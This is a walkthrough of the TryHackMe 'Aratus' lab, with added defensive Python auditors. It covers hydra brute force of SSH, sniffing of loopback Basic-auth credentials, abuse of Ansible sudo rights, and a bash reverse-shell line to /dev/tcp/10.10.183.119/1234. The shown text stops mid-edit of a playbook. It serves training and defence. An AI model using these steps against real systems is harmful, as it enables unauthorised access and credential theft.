TryHackMe: Aratus (Difficulty: Medium)

Do you like reading? Do you like to go through tons of text? Aratus has what you need!

The room is https://tryhackme.com/room/aratus

Task 1: Start up the VM

Start Machine

Perform a penetration test against a vulnerable machine. Your end-goal is to become the root user and retrieve the two flags:

  • /home/{{user}}/user.txt
  • /root/root.txt

The flags are always in the same format, where XYZ is an MD5 hash: THM{XYZ}

Answer the questions below:

The VM is booted up!

No answer needed.

Task 2: Get both flags

Good luck!

Answer the questions below:

What is the user.txt flag?

Port and service scanning with nmap:

root@ip-10-10-183-119:~# nmap -sCSV -O -n -Pn -T4 -p- 10.10.150.85

Starting Nmap 7.60 ( https://nmap.org ) at 2022-03-26 12:13 GMT
Stats: 0:02:11 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 40.81% done; ETC: 12:18 (0:03:07 remaining)
Stats: 0:03:55 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 92.03% done; ETC: 12:17 (0:00:20 remaining)
Nmap scan report for 10.10.150.85
Host is up (0.00048s latency).
Not shown: 65529 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 6 Jun 09 2021 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.183.119
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 09:23:62:a2:18:62:83:69:04:40:62:32:97:ff:3c:cd (RSA)
| 256 33:66:35:36:b0:68:06:32:c1:8a:f6:01:bc:43:38:ce (ECDSA)
|_ 256 14:98:e3:84:70:55:e6:60:0c:c2:09:77:f8:b7:a6:1c (EdDSA)
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
|_http-title: Apache HTTP Server Test Page powered by CentOS
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
|_http-title: Apache HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=aratus/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2021-11-23T12:28:26
|_Not valid after: 2022-11-23T12:28:26
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.10.16 (workgroup: WORKGROUP)
MAC Address: 02:F9:4A:75:69:97 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.13 (92%), Linux 3.8 (92%), Crestron XPanel control system (89%), HP P2000 G3 NAS device (86%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.16 (86%), Linux 3.2 (86%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (86%), Linux 2.6.32 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: ARATUS; OS: Unix

Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.10.16)
| Computer name: aratus
| NetBIOS computer name: ARATUS\x00
| Domain name: \x00
| FQDN: aratus
|_ System time: 2022-03-26T13:17:56+01:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-03-26 12:17:56
|_ start_date: 1600-12-31 23:58:45

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 280.48 seconds

First, check FTP. Anonymous login is allowed, but the pub directory is empty:

root@ip-10-10-183-119:~# ftp 10.10.150.85
Connected to 10.10.150.85.
220 (vsFTPd 3.0.2)
Name (10.10.150.85:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 6 Jun 09 2021 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 6 Jun 09 2021 .
drwxr-xr-x 3 0 0 17 Nov 23 09:56 ..
226 Directory send OK.
ftp>
ftp> exit
221 Goodbye.

Check the web site with directory fuzzing:

root@ip-10-10-183-119:~# gobuster dir -u http://10.10.150.85/ -w /usr/share/wordlists/dirb/common.txt -t 35 -q -n -e
http://10.10.150.85/.htpasswd
http://10.10.150.85/.hta
http://10.10.150.85/.htaccess
http://10.10.150.85/cgi-bin/

Check SMB. Anonymous listing is allowed, and the "temporary share" turns out to be Simeon's home directory:

root@ip-10-10-183-119:~# smbclient -L //10.10.150.85 -N
WARNING: The "syslog" option is deprecated
Anonymous login successful

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
temporary share Disk
IPC$ IPC IPC Service (Samba 4.10.16)
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

Server Comment
--------- -------

Workgroup Master
--------- -------
root@ip-10-10-183-119:~# smbclient //10.10.150.85/"temporary share" -N
WARNING: The "syslog" option is deprecated
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 10 13:06:44 2022
.. D 0 Tue Nov 23 16:24:05 2021
.bash_logout H 18 Wed Apr 1 03:17:30 2020
.bash_profile H 193 Wed Apr 1 03:17:30 2020
.bashrc H 231 Wed Apr 1 03:17:30 2020
.bash_history H 0 Sat Mar 26 12:10:56 2022
chapter1 D 0 Tue Nov 23 10:07:47 2021
chapter2 D 0 Tue Nov 23 10:08:11 2021
chapter3 D 0 Tue Nov 23 10:08:18 2021
chapter4 D 0 Tue Nov 23 10:08:25 2021
chapter5 D 0 Tue Nov 23 10:08:33 2021
chapter6 D 0 Tue Nov 23 10:12:24 2021
chapter7 D 0 Tue Nov 23 11:14:27 2021
chapter8 D 0 Tue Nov 23 10:12:45 2021
chapter9 D 0 Tue Nov 23 10:12:53 2021
.ssh DH 0 Mon Jan 10 13:05:34 2022
.viminfo H 0 Sat Mar 26 12:10:56 2022
message-to-simeon.txt N 251 Mon Jan 10 13:06:44 2022

37726212 blocks of size 1024. 35584344 blocks available
smb: \> more message-to-simeon.txt
Simeon,

Stop messing with your home directory, you are moving files and directories insecurely!
Just make a folder in /opt for your book project...

Also you password is insecure, could you please change it? It is all over the place now!

- Theodore

Simeon's home directory is also served over HTTP at http://10.10.150.85/simeon/, so the book chapters are public. Theodore's note says the password is "all over the place", so generate a password list from that text using cewl:

root@ip-10-10-183-119:~# cewl -w pass.txt -d 5 -m 5 http://10.10.150.85/simeon/
CeWL 5.3 (Heading Upwards) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
/usr/lib/ruby/vendor_ruby/spider/spider_instance.rb:125: warning: constant ::Fixnum is deprecated
root@ip-10-10-183-119:~# ls
Desktop Downloads Instructions Pictures Postman Rooms Scripts thinclient_drives Tools pass.txt
root@ip-10-10-183-119:~# wc -l pass.txt
159 pass.txt

Use hydra with that list against SSH:

root@ip-10-10-183-119:~# hydra -l simeon -P pass.txt 10.10.150.85 ssh -t 4 -f -vV
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2022-03-26 12:49:18
[DATA] max 4 tasks per 1 server, overall 4 tasks, 159 login tries (l:1/p:159), ~40 tries per task
[DATA] attacking ssh://10.10.150.85:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://simeon@10.10.150.85:22
[INFO] Successful, password authentication is supported by ssh://10.10.150.85:22
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "tellus" - 1 of 159 [child 0] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "pulvinar" - 2 of 159 [child 1] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "vitae" - 3 of 159 [child 2] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "neque" - 4 of 159 [child 3] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "suspendisse" - 5 of 159 [child 0] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "pellentesque" - 6 of 159 [child 2] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "dolor" - 7 of 159 [child 3] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "convallis" - 8 of 159 [child 1] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "aliquam" - 9 of 159 [child 0] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "faucibus" - 10 of 159 [child 2] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "purus" - 11 of 159 [child 3] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "rhoncus" - 12 of 159 [child 1] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "tincidunt" - 13 of 159 [child 0] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "laoreet" - 14 of 159 [child 2] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "malesuada" - 15 of 159 [child 3] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "scelerisque" - 16 of 159 [child 1] (0/0)
[22][ssh] host: 10.10.150.85 login: simeon password: scelerisque
[STATUS] attack finished for 10.10.150.85 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2022-03-26 12:49:25
root@ip-10-10-183-119:~# ssh simeon@10.10.150.85
The authenticity of host '10.10.150.85 (10.10.150.85)' can't be established.
ECDSA key fingerprint is SHA256:5CxDqeYb3rPlNvmv3Hd+R2ZZuwoGQ/2fuul51QgP/N0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.150.85' (ECDSA) to the list of known hosts.
simeon@10.10.150.85's password:
Last failed login: Sat Mar 26 13:49:27 CET 2022 from ip-10-10-183-119.eu-west-1.compute.internal on ssh:notty
There were 15 failed login attempts since the last successful login.
Last login: Mon Jan 10 14:07:52 2022 from 172.16.42.100
[simeon@aratus ~]$ whoami
simeon
[simeon@aratus ~]$ pwd
/home/simeon
[simeon@aratus ~]$ ls
chapter1 chapter2 chapter3 chapter4 chapter5 chapter6 chapter7 chapter8 chapter9 message-to-simeon.txt
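Theodore's note said Simeon's password was "all over the place", and cewl confirmed it: the password is a plain word from the book chapters published under /simeon/. As an added example (not part of the original write-up), the Python below does the defensive version of that check: extract the words of at least five letters from pages a user has published, the same idea as cewl -m 5, and test whether a candidate password, lower-cased and with trailing digits and punctuation stripped, is one of them. The sample chapter HTML is constructed for this example.

```python
import re
from html.parser import HTMLParser

# Constructed sample: one "chapter" page of the kind a user might publish from
# a web-served home directory. The text is made up for this example.
SAMPLE_CHAPTER = """<html><head><title>Chapter 1</title>
<style>body { font-family: serif; }</style></head>
<body><h1>Chapter 1</h1>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque
scelerisque purus vitae neque tincidunt, nec laoreet tellus convallis.</p>
<script>var ignoredToken = "zzzzsecretzzzz";</script>
</body></html>"""


class _TextExtractor(HTMLParser):
    """Collect visible text only; script and style bodies are not prose."""

    def __init__(self):
        super().__init__()
        self._skip_depth = 0
        self.chunks = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth:
            self.chunks.append(data)


def words_from_html(html, min_len=5):
    """Lower-cased words of at least min_len letters in the page's visible
    text (the same idea as cewl -m 5, restricted to a single page)."""
    extractor = _TextExtractor()
    extractor.feed(html)
    text = " ".join(extractor.chunks)
    pattern = r"[A-Za-z]{%d,}" % min_len
    return {w.lower() for w in re.findall(pattern, text)}


def normalize_password(password):
    """Reduce a candidate password to its alphabetic core: lower-case it and
    drop trailing digits or punctuation, so 'Scelerisque2021!' is judged by
    the word it is built on."""
    return re.sub(r"[^a-z]+$", "", password.lower())


def password_in_public_text(password, html_pages, min_len=5):
    """True when the password's core is a word that appears in any of the
    given pages, i.e. a wordlist built from them would contain it."""
    core = normalize_password(password)
    if len(core) < min_len:
        # Below the wordlist's minimum length, so not in such a list.
        return False
    published = set()
    for page in html_pages:
        published |= words_from_html(page, min_len)
    return core in published


if __name__ == "__main__":
    for candidate in ("scelerisque", "Scelerisque2021!", "correct-horse-battery"):
        print(candidate, "->", password_in_public_text(candidate, [SAMPLE_CHAPTER]))
```

A real deployment would feed the check every page the user has published (the whole /simeon/ tree here) and run it at password-change time; appending a year and a symbol, as the normalisation shows, does not help when the base word is public.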

Check the crontab and use pspy64 to watch the processes that cron starts:

[simeon@aratus tmp]$ cat /etc/crontab 
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
[simeon@aratus tmp]$
[simeon@aratus tmp]$ ./pspy64
.
2022/03/26 15:53:01 CMD: UID=0 PID=17248 | /usr/sbin/crond -n
2022/03/26 15:53:01 CMD: UID=0 PID=17247 | /usr/sbin/crond -n
2022/03/26 15:53:01 CMD: UID=0 PID=17246 | /usr/sbin/crond -n
2022/03/26 15:53:01 CMD: UID=0 PID=17249 | /usr/sbin/crond -n
2022/03/26 15:53:01 CMD: UID=0 PID=17251 | /usr/sbin/CROND -n
2022/03/26 15:53:01 CMD: UID=1001 PID=17252 | /bin/sh -c /usr/bin/python3 /home/theodore/scripts/test-www-auth.py >/dev/null 2>&1
2022/03/26 15:53:01 CMD: UID=0 PID=17254 | /bin/sh -c ping -c 30 127.0.0.1 >/dev/null 2>&1
2022/03/26 15:53:01 CMD: UID=0 PID=17253 | /bin/sh -c ping -c 30 127.0.0.1 >/dev/null 2>&1
2022/03/26 15:53:01 CMD: UID=1001 PID=17256 | /bin/sh -c uname -p 2> /dev/null
2022/03/26 15:53:01 CMD: UID=1001 PID=17255 | /bin/sh -c uname -p 2> /dev/null
^CExiting program... (interrupt)
[simeon@aratus tmp]$ cat /home/theodore/scripts/test-www-auth.py
cat: /home/theodore/scripts/test-www-auth.py: Permission denied
[simeon@aratus tmp]$

We have no read permission on /home/theodore/scripts/test-www-auth.py, but pspy shows it runs every minute alongside pings to 127.0.0.1, and its name suggests it tests web authentication. So instead of reading the script, sniff what it sends on the loopback interface with tcpdump:

[simeon@aratus home]$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
link/ether 02:f9:4a:75:69:97 brd ff:ff:ff:ff:ff:ff
inet 10.10.150.85/16 brd 10.10.255.255 scope global dynamic eth0
valid_lft 2490sec preferred_lft 2490sec
inet6 fe80::f9:4aff:fe75:6997/64 scope link
valid_lft forever preferred_lft forever
[simeon@aratus home]$ tcpdump -i lo -A
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
13:58:29.861199 IP localhost > localhost: ICMP echo request, id 2473, seq 29, length 64
E..T.A@.@.0f............ .....?b.....#...................... !"#$%&'()*+,-./01234567
13:58:29.861215 IP localhost > localhost: ICMP echo reply, id 2473, seq 29, length 64
E..T.B..@.pe............ .....?b.....#...................... !"#$%&'()*+,-./01234567
13:58:30.861181 IP localhost > localhost: ICMP echo request, id 2473, seq 30, length 64
E..T..@.@.,............. .....?b.....#...................... !"#$%&'()*+,-./01234567
13:58:30.861197 IP localhost > localhost: ICMP echo reply, id 2473, seq 30, length 64
E..T....@.l............. .....?b.....#...................... !"#$%&'()*+,-./01234567
13:59:01.909340 IP localhost > localhost: ICMP echo request, id 2535, seq 1, length 64
E..TbS@.@..S............ .....?b............................ !"#$%&'()*+,-./01234567
13:59:01.909355 IP localhost > localhost: ICMP echo reply, id 2535, seq 1, length 64
E..TbT..@..S............ .....?b............................ !"#$%&'()*+,-./01234567
13:59:02.072150 IP localhost.36912 > localhost.http: Flags [S], seq 2094205763, win 43690, options [mss 65495,sackOK,TS val 2603563 ecr 0,nop,wscale 7], length 0
E..<.h@.@..Q.........0.P|..C.........0.........
.'.+........
13:59:02.072172 IP localhost.http > localhost.36912: Flags [S.], seq 3605149114, ack 2094205764, win 43690, options [mss 65495,sackOK,TS val 2603564 ecr 2603563,nop,wscale 7], length 0
E..<..@.@.<..........P.0..5.|..D.....0.........
.'.,.'.+....
13:59:02.072185 IP localhost.36912 > localhost.http: Flags [.], ack 1, win 342, options [nop,nop,TS val 2603564 ecr 2603564], length 0
E..4.i@.@..X.........0.P|..D..5....V.(.....
.'.,.'.,
13:59:02.072395 IP localhost.36912 > localhost.http: Flags [P.], seq 1:224, ack 1, win 342, options [nop,nop,TS val 2603564 ecr 2603564], length 223: HTTP: GET /test-auth/index.html HTTP/1.1
E....j@.@..x.........0.P|..D..5....V.......
.'.,.'.,GET /test-auth/index.html HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.14.2
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Authorization: Basic dGhlb2RvcmU6UmlqeWFzd2FoZWJjZWliYXJqaWs=


13:59:02.072412 IP localhost.http > localhost.36912: Flags [.], ack 224, win 350, options [nop,nop,TS val 2603564 ecr 2603564], length 0
E..4..@.@..*.........P.0..5.|..#...^.(.....
.'.,.'.,

We captured an Authorization: Basic header. Basic authentication is only base64-encoded, not encrypted, so decode it:

root@ip-10-10-183-119:~# echo "dGhlb2RvcmU6UmlqeWFzd2FoZWJjZWliYXJqaWs=" | base64 -d
theodore:Rijyaswahebceibarjik
root@ip-10-10-183-119:~#
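The lesson here is that HTTP Basic authentication is a base64 encoding, not protection: anyone who can read the traffic (here, a local user able to capture on the loopback interface) recovers the credentials. As an added example, not part of the original write-up, here is a small Python auditor that scans tcpdump -A style text for Authorization: Basic headers, decodes them and reports the user with the password masked, so a defender can find cleartext credentials in a capture without republishing them. The capture text, the credentials alice:constructed-secret and the second malformed request are constructed for this example.

```python
import base64
import binascii
import re

# Constructed sample: what `tcpdump -i lo -A` prints for a scripted request
# that carries HTTP Basic credentials, trimmed to the readable lines. The
# credentials (alice:constructed-secret) and the second request are made up.
SAMPLE_CAPTURE = """\
13:59:02.072395 IP localhost.36912 > localhost.http: Flags [P.], seq 1:224, ack 1, win 342, length 223: HTTP: GET /test-auth/index.html HTTP/1.1
GET /test-auth/index.html HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.14.2
Accept: */*
Authorization: Basic YWxpY2U6Y29uc3RydWN0ZWQtc2VjcmV0
Connection: keep-alive

13:59:03.100000 IP localhost.36914 > localhost.http: Flags [P.], seq 1:90, ack 1, win 342, length 89: HTTP: GET /other HTTP/1.1
GET /other HTTP/1.1
Authorization: Basic YWJj
"""

# One Authorization header per line; the token is base64, possibly padded.
BASIC_AUTH_RE = re.compile(
    r"^Authorization:\s*Basic\s+([A-Za-z0-9+/]+=*)\s*$",
    re.IGNORECASE | re.MULTILINE,
)


def mask_secret(secret):
    """Keep only the first and last character so a report can be shared
    without spreading the password further."""
    if len(secret) <= 2:
        return "*" * len(secret)
    return secret[0] + "*" * (len(secret) - 2) + secret[-1]


def find_basic_auth(capture_text):
    """Scan tcpdump -A style text for Basic credentials sent in the clear.
    Returns one dict per header: line number, user, masked password, note."""
    findings = []
    for match in BASIC_AUTH_RE.finditer(capture_text):
        line_no = capture_text.count("\n", 0, match.start()) + 1
        token = match.group(1)
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            findings.append({"line": line_no, "user": None,
                             "password_masked": None,
                             "note": "token is not valid base64"})
            continue
        user, sep, password = decoded.partition(":")
        if not sep:
            # RFC 7617 requires user:password; anything else is malformed.
            findings.append({"line": line_no, "user": user,
                             "password_masked": None,
                             "note": "no ':' separator"})
            continue
        findings.append({"line": line_no, "user": user,
                         "password_masked": mask_secret(password),
                         "note": "cleartext Basic credentials on the wire"})
    return findings


if __name__ == "__main__":
    for finding in find_basic_auth(SAMPLE_CAPTURE):
        print(finding)
```

Run it over the text output of tcpdump -A (or tshark -V) from a test capture; a hit against plain HTTP, as on this box, means the credential must be rotated and the client moved to HTTPS or to a non-reusable token. The masked report is what you put in the ticket.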

Log in with SSH as theodore using the recovered password:

root@ip-10-10-183-119:~# ssh theodore@10.10.150.85
theodore@10.10.150.85's password:
Last login: Fri Mar 25 21:57:42 2022
[theodore@aratus ~]$ whoami
theodore
[theodore@aratus ~]$ ls
scripts user.txt
[theodore@aratus ~]$ cat user.txt
THM{baXXXXXXXXXXXXXXXXXXXXXXXXXXXX20}

What is the root.txt flag?

Check sudo permissions:

[theodore@aratus home]$ sudo -l -l
Matching Defaults entries for theodore on aratus:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User theodore may run the following commands on aratus:

Sudoers entry:
RunAsUsers: automation
Options: !authenticate
Commands:
/opt/scripts/infra_as_code.sh
[theodore@aratus home]$ ls -l /opt/scripts/infra_as_code.sh
-rwxr-xr-x. 1 root root 84 Nov 23 13:20 /opt/scripts/infra_as_code.sh
[theodore@aratus home]$ cat /opt/scripts/infra_as_code.sh
#!/bin/bash
cd /opt/ansible
/usr/bin/ansible-playbook /opt/ansible/playbooks/*.yaml
[theodore@aratus ~]$ cd /opt/ansible
[theodore@aratus ansible]$ ls -l
total 12
-rw-r--r--. 1 automation automation 190 Nov 23 13:09 ansible.cfg
-rw-r--r--. 1 root root 13 Mar 26 13:12 inventory
drwxr-xr-x. 2 automation automation 99 Nov 23 13:55 playbooks
-rw-r--r--. 1 theodore theodore 224 Nov 23 14:01 README.txt
drwxr-xr-x. 3 automation automation 32 Nov 23 13:25 roles
[theodore@aratus ansible]$ cd roles/
[theodore@aratus roles]$ ls -la
total 0
drwxr-xr-x. 3 automation automation 32 Nov 23 13:25 .
drwxr-x---. 4 automation theodore 90 Nov 23 17:59 ..
drwxr-xr-x. 9 automation automation 178 Dec 2 11:55 geerlingguy.apache
[theodore@aratus roles]$ cd geerlingguy.apache/
[theodore@aratus geerlingguy.apache]$ ls -l
total 16
drwxr-xr-x. 2 automation automation 22 Dec 2 11:55 defaults
drwxr-xr-x. 2 automation automation 22 Dec 2 11:55 handlers
-rw-rw-r--. 1 automation automation 1080 Dec 2 11:55 LICENSE
drwxr-xr-x. 2 automation automation 50 Dec 2 11:55 meta
drwxr-xr-x. 3 automation automation 21 Dec 2 11:55 molecule
-rw-rw-r--. 1 automation automation 8384 Dec 2 11:55 README.md
drwxr-xr-x. 2 automation automation 228 Dec 2 11:55 tasks
drwxr-xr-x. 2 automation automation 28 Dec 2 11:55 templates
drwxr-xr-x. 2 automation automation 142 Dec 2 11:55 vars
[theodore@aratus geerlingguy.apache]$ cd tasks/
[theodore@aratus tasks]$ ls -l
total 36
-rw-rw-r--. 1 automation automation 1693 Dec 2 11:55 configure-Debian.yml
-rw-rw-r--+ 1 automation automation 1123 Dec 2 11:55 configure-RedHat.yml
-rw-rw-r--. 1 automation automation 546 Dec 2 11:55 configure-Solaris.yml
-rw-rw-r--. 1 automation automation 711 Dec 2 11:55 configure-Suse.yml
-rw-rw-r--. 1 automation automation 1388 Dec 2 11:55 main.yml
-rw-rw-r--. 1 automation automation 193 Dec 2 11:55 setup-Debian.yml
-rw-rw-r--. 1 automation automation 198 Dec 2 11:55 setup-RedHat.yml
-rw-rw-r--. 1 automation automation 134 Dec 2 11:55 setup-Solaris.yml
-rw-rw-r--. 1 automation automation 133 Dec 2 11:55 setup-Suse.yml
[theodore@aratus tasks]$

configure-RedHat.yml has a "+" at the end of its mode string, which means the file carries an extended POSIX ACL beyond the classic owner/group/other bits (getfacl shows the entries). Whatever the ACL grants, theodore can edit this task file, and the sudo rule lets him run ansible-playbook over it as the automation user.
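The root cause of this escalation is a sudoers rule that executes a whole directory tree of playbooks and roles as another account while one file in that tree is writable by the caller. As an added example (not part of the write-up), the Python below audits an Ansible tree the way a defender would before allowing it in a sudoers rule: every entry must be owned by a trusted uid, must not be group- or world-writable, must not be a symlink, and must not carry an extended ACL (the "+" above), which is flagged for a manual getfacl check. The demo tree it builds under a temporary directory is constructed; the ACL check reads the Linux system.posix_acl_access xattr (assumption: Linux) and reports False where os.getxattr does not exist.

```python
import os
import shutil
import stat
import tempfile

# Linux stores POSIX ACLs in this extended attribute; its presence is what
# `ls -l` reports as a trailing '+' in the mode string.
ACL_XATTR = "system.posix_acl_access"


def has_extended_acl(path):
    """True if the file has an ACL beyond the classic mode bits. Assumes Linux;
    on platforms without os.getxattr the check is skipped and returns False."""
    getxattr = getattr(os, "getxattr", None)
    if getxattr is None:
        return False
    try:
        getxattr(path, ACL_XATTR)
        return True
    except OSError:  # ENODATA (no ACL) or ENOTSUP (no xattr support)
        return False


def audit_tree(root, trusted_uids):
    """Return (path, reason) for every entry under root that someone outside
    the trusted uids could change: wrong owner, group/world write bit, symlink
    (its target escapes this audit), or an extended ACL needing a manual look."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            reasons = []
            is_link = stat.S_ISLNK(st.st_mode)
            if is_link:
                reasons.append("symlink")
            if st.st_uid not in trusted_uids:
                reasons.append("owned by untrusted uid %d" % st.st_uid)
            if st.st_mode & stat.S_IWGRP:
                reasons.append("group-writable")
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if not is_link and has_extended_acl(path):
                reasons.append("extended ACL present (+)")
            if reasons:
                findings.append((path, ", ".join(reasons)))
    return findings


def make_demo_tree():
    """Constructed stand-in for /opt/ansible: a playbook with sane permissions,
    a role task file that is group-writable (the weak setting), and a symlinked
    task file pointing outside the tree."""
    root = tempfile.mkdtemp(prefix="ansible-audit-")
    tasks = os.path.join(root, "roles", "example.apache", "tasks")
    playbooks = os.path.join(root, "playbooks")
    os.makedirs(tasks)
    os.makedirs(playbooks)
    for d in (root, os.path.join(root, "roles"),
              os.path.join(root, "roles", "example.apache"), tasks, playbooks):
        os.chmod(d, 0o755)
    safe = os.path.join(playbooks, "site.yaml")
    weak = os.path.join(tasks, "configure-RedHat.yml")
    for path, mode in ((safe, 0o644), (weak, 0o664)):
        with open(path, "w") as fh:
            fh.write("---\n- name: placeholder task\n  command: /bin/true\n")
        os.chmod(path, mode)
    os.symlink("/tmp/elsewhere.yml", os.path.join(tasks, "linked.yml"))
    return root


def run_demo():
    """Audit the demo tree with the current user as the only trusted owner,
    then remove it. Returns {basename: reason} for the flagged entries."""
    root = make_demo_tree()
    try:
        return {os.path.basename(p): r for p, r in audit_tree(root, {os.getuid()})}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for name, reason in sorted(run_demo().items()):
        print("%-22s %s" % (name, reason))
```

For a real tree the trusted set would be {0, uid of the RunAs user}, and the audit belongs in whatever deploys the playbooks, run again before each sudo-backed invocation; on this box it would have flagged the ACL on configure-RedHat.yml and the theodore-owned README.txt sitting in /opt/ansible.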

[theodore@aratus tasks]$ vi /tmp/shell.sh
bash -c 'exec bash -i &>/dev/tcp/10.10.183.119/1234 <&1'
[theodore@aratus tasks]$ ls -l /tmp/
total 4
-rw-rw-r--. 1 theodore theodore 57 Mar 26 14:31 shell.sh
drwx------. 3 root root 17 Mar 26 13:11 systemd-private-1cfc04a8ee0b4ca9bff1574648504d18-httpd.service-ROh5lX
[theodore@aratus tasks]$ vi configure-RedHat.yml
---
- name: Configure Apache.
  lineinfile:
    dest: "{{ apache_server_root }}/conf/{{ apache_daemon }}.conf"
    regexp: "{{ item.regexp }}"
    line: "{{ item.line }}"
    state: present
    mode: 0644
  with_items: "{{ apache_ports_configuration_items }}"
  notify: restart apache

